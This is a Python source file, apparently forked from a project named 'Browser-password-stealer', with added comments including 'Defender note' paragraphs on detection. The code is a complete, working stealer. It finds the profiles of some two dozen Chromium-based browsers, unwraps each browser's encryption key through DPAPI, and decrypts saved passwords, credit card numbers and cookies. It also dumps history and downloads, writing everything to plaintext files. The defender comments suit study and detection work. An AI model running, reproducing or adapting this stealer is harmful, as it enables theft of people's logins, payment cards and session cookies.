forked from henry-richard7/Browser-password-stealer
chromium_based_browsers.py
import base64
import json
import os
import shutil
import sqlite3
from datetime import datetime, timedelta
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData
# Per-user base directories taken from the Windows environment. os.getenv
# returns None when a variable is unset, in which case the concatenations in
# the dict below raise TypeError as soon as the module is loaded.
appdata = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
# Browser label -> profile root directory for the Chromium-based browsers this
# script looks for. Every path is inside the current user's own profile, so
# nothing here needs elevation.
# Defender note: these directories hold "Local State" and the per-profile
# SQLite stores. Read access to them by a process that is not the owning
# browser is the behaviour to audit and alert on.
browsers = {
'avast': appdata + '\\AVAST Software\\Browser\\User Data',
'amigo': appdata + '\\Amigo\\User Data',
'torch': appdata + '\\Torch\\User Data',
'kometa': appdata + '\\Kometa\\User Data',
'orbitum': appdata + '\\Orbitum\\User Data',
'cent-browser': appdata + '\\CentBrowser\\User Data',
'7star': appdata + '\\7Star\\7Star\\User Data',
'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
'vivaldi': appdata + '\\Vivaldi\\User Data',
'chromium': appdata + '\\Chromium\\User Data',
'chrome-canary': appdata + '\\Google\\Chrome SxS\\User Data',
'chrome': appdata + '\\Google\\Chrome\\User Data',
'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
'msedge': appdata + '\\Microsoft\\Edge\\User Data',
'msedge-canary': appdata + '\\Microsoft\\Edge SxS\\User Data',
'msedge-beta': appdata + '\\Microsoft\\Edge Beta\\User Data',
'msedge-dev': appdata + '\\Microsoft\\Edge Dev\\User Data',
'uran': appdata + '\\uCozMedia\\Uran\\User Data',
'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
'iridium': appdata + '\\Iridium\\User Data',
'coccoc': appdata + '\\CocCoc\\Browser\\User Data',
# The two Opera entries live under APPDATA (roaming), not LOCALAPPDATA.
'opera': roaming + '\\Opera Software\\Opera Stable',
'opera-gx': roaming + '\\Opera Software\\Opera GX Stable'
}
# Table of artifacts read from each profile. Every entry carries:
#   'query'   - SQL executed against a copy of the profile database
#   'file'    - database path relative to the profile directory
#   'columns' - labels zipped with each result row when formatting output
#   'decrypt' - whether bytes values in a row go through decrypt_password
# Defender note: the stores named here (Login Data, Web Data, Network\Cookies,
# History) are the ones worth covering with file-access auditing or EDR rules,
# keyed on the accessing process not being the browser itself.
data_queries = {
'login_data': {
'query': 'SELECT action_url, username_value, password_value FROM logins',
'file': '\\Login Data',
'columns': ['URL', 'Email', 'Password'],
'decrypt': True
},
'credit_cards': {
'query': 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards',
'file': '\\Web Data',
'columns': ['Name On Card', 'Card Number', 'Expires On', 'Added On'],
'decrypt': True
},
'cookies': {
'query': 'SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies',
'file': '\\Network\\Cookies',
'columns': ['Host Key', 'Cookie Name', 'Path', 'Cookie', 'Expires On'],
'decrypt': True
},
# 'history' and 'downloads' both read the same History database and hold no
# encrypted columns.
'history': {
'query': 'SELECT url, title, last_visit_time FROM urls',
'file': '\\History',
'columns': ['URL', 'Title', 'Visited Time'],
'decrypt': False
},
'downloads': {
'query': 'SELECT tab_url, target_path FROM downloads',
'file': '\\History',
'columns': ['Download URL', 'Local Path'],
'decrypt': False
}
}
# Read the browser's "Local State" file under `path` and return the unwrapped
# os_crypt key as bytes. Returns None when `path` does not exist or when the
# file contains no 'os_crypt' text.
# Defender note: the unwrap below is a DPAPI call, so it only succeeds in the
# logon context of the user who owns the profile. A non-browser process that
# reads Local State and then calls CryptUnprotectData is a strong detection
# signal. Recent Chromium builds on Windows additionally bind protected data
# to the browser application (app-bound encryption), which a plain DPAPI
# unprotect does not satisfy - keeping browsers updated is a mitigation.
def get_master_key(path: str):
if not os.path.exists(path):
return
# First read is only a substring test; this handle is never closed explicitly.
if 'os_crypt' not in open(path + "\\Local State", 'r', encoding='utf-8').read():
return
with open(path + "\\Local State", "r", encoding="utf-8") as f:
c = f.read()
local_state = json.loads(c)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
# Drop the 5-byte prefix (Chromium prepends the ASCII tag "DPAPI" to the blob).
key = key[5:]
# pywin32 returns a (description, data) tuple; index 1 is the unprotected data.
key = CryptUnprotectData(key, None, None, None, 0)[1]
return key
# Decrypt one AES-GCM protected value from a profile database and return it as
# text. `buff` is the raw column value, `key` the bytes from get_master_key.
# The first 3 bytes are skipped without being checked (presumably the
# "v10"-style version tag - confirm against the browser version in use).
def decrypt_password(buff: bytes, key: bytes) -> str:
# Bytes 3..14 are used as the 12-byte GCM nonce; everything after is
# ciphertext followed by the tag.
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
# decrypt() alone does not authenticate: the tag is never verified, so a wrong
# key or an unexpected blob layout produces garbage instead of an error here.
decrypted_pass = cipher.decrypt(payload)
# Strip the trailing 16 bytes (the GCM tag) and decode with the default codec;
# non-text output raises UnicodeDecodeError.
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
# Write `content` to <browser_name>/<type_of_data>.txt relative to the current
# working directory, creating the directory if needed, and print a status line.
# Nothing is written when `content` is "" or None.
# Defender note: the output is plaintext on disk. Directories named after
# browsers that contain login_data.txt, cookies.txt, credit_cards.txt and so on
# are a forensic indicator that this tool (or a fork) has run.
def save_results(browser_name, type_of_data, content):
if not os.path.exists(browser_name):
os.mkdir(browser_name)
if content != "" and content != None:
# The file handle is not closed explicitly; flushing is left to the interpreter.
open(f'{browser_name}/{type_of_data}.txt', 'w', encoding="utf-8").write(content)
print(f"\t [*] Saved in {browser_name}/{type_of_data}.txt")
else:
print(f"\t [-] No Data Found!")
# Run one data_queries entry (`type_of_data`) against the matching database in
# `path`\`profile` and return the rows formatted as "label: value" text.
# Returns None when the database file does not exist and "" when it cannot be
# copied.
# Defender note: the database is copied to a file named 'temp_db' in the
# current working directory before it is opened. A copy of Login Data, Web Data
# or Cookies appearing under that name outside the browser profile is a useful
# file-creation indicator.
def get_data(path: str, profile: str, key, type_of_data):
db_file = f'{path}\\{profile}{type_of_data["file"]}'
if not os.path.exists(db_file):
return
result = ""
try:
# Work on a copy rather than the live file (presumably because the running
# browser may hold a lock on it).
shutil.copy(db_file, 'temp_db')
except:
# Bare except: every failure, of any kind, is reported as an access problem.
print(f"Can't access file {type_of_data['file']}")
return result
conn = sqlite3.connect('temp_db')
cursor = conn.cursor()
cursor.execute(type_of_data['query'])
for row in cursor.fetchall():
row = list(row)
if type_of_data['decrypt']:
for i in range(len(row)):
# Only non-empty bytes values are treated as encrypted.
if isinstance(row[i], bytes) and row[i]:
row[i] = decrypt_password(row[i], key)
# NOTE(review): data_type_name is not a parameter; it is the loop variable of
# the __main__ block, so this function depends on that module-level state.
if data_type_name == 'history':
if row[2] != 0:
row[2] = convert_chrome_time(row[2])
else:
row[2] = "0"
# zip() stops at the shorter sequence, so extra row values are dropped.
result += "\n".join([f"{col}: {val}" for col, val in zip(type_of_data['columns'], row)]) + "\n\n"
# Cleanup is not in a finally block: an exception raised above leaves temp_db
# on disk.
conn.close()
os.remove('temp_db')
return result
def convert_chrome_time(chrome_time):
    """Format a Chromium timestamp as 'DD/MM/YYYY HH:MM:SS'.

    chrome_time is treated as a count of microseconds since
    1601-01-01 00:00:00. The result is a naive value: no timezone
    conversion is applied.
    """
    epoch_1601 = datetime(1601, 1, 1)
    elapsed = timedelta(microseconds=chrome_time)
    moment = epoch_1601 + elapsed
    return moment.strftime('%d/%m/%Y %H:%M:%S')
# Return the labels from `browsers` whose profile root contains a
# "Local State" file, i.e. the browsers that have been run by the current user.
def installed_browsers():
available = []
for x in browsers.keys():
if os.path.exists(browsers[x] + "\\Local State"):
available.append(x)
return available
# Script entry point: for every browser found for the current user, unwrap its
# key once, then read each data_queries entry and write the result to a text
# file under a directory named after the browser.
# Defender note: end to end, the observable sequence is a non-browser process
# that stats many browser profile paths, reads Local State, calls DPAPI, copies
# profile databases to 'temp_db' and writes plaintext .txt files. Each step is
# a separate detection opportunity.
if __name__ == '__main__':
available_browsers = installed_browsers()
for browser in available_browsers:
browser_path = browsers[browser]
master_key = get_master_key(browser_path)
print(f"Getting Stored Details from {browser}")
# data_type_name is also read inside get_data as a module-level name.
for data_type_name, data_type in data_queries.items():
print(f"\t [!] Getting {data_type_name.replace('_', ' ').capitalize()}")
notdefault = ['opera-gx'] # Browsers that we do not specify "Default" for profile
# Only the "Default" profile is read; other profile directories are not visited.
profile = "Default"
if browser in notdefault:
profile = ""
data = get_data(browser_path, profile, master_key, data_type)
save_results(browser, data_type_name, data)
print("\t------\n")